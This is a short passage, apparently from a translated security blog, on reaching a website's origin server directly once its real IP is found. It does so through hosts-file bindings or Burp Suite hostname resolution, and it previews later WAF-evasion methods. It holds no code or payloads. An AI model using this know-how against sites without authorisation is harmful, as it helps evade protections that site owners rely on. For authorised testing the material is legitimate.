Just wait for a while, here is also a screenshot for everyone, in case of misunderstanding that the tool cannot be used:
0x04 how to use the real IP address
●You can modify the hosts file to bind the domain name to the IP address. (If not, it is not recommended to read this article.)
●If you use the burpsuite test, you can add the domain name and IP address record in the Project options --> Connections --> Hostname Resolution.
0x05 from high latitude confrontation
●Protocol layer control/dynamic and static tables/export blocking/concurrency mechanism conversion/coding amplification...... The content of the high-latitude confrontation will be detailed in (2). (To be continued)